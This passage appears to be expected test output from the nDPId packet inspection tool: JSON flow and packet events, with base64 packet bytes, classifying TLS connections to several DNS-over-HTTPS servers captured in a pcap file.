VkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQ
fRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+
2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} 
+01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeA
CLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} +01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIG
q1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 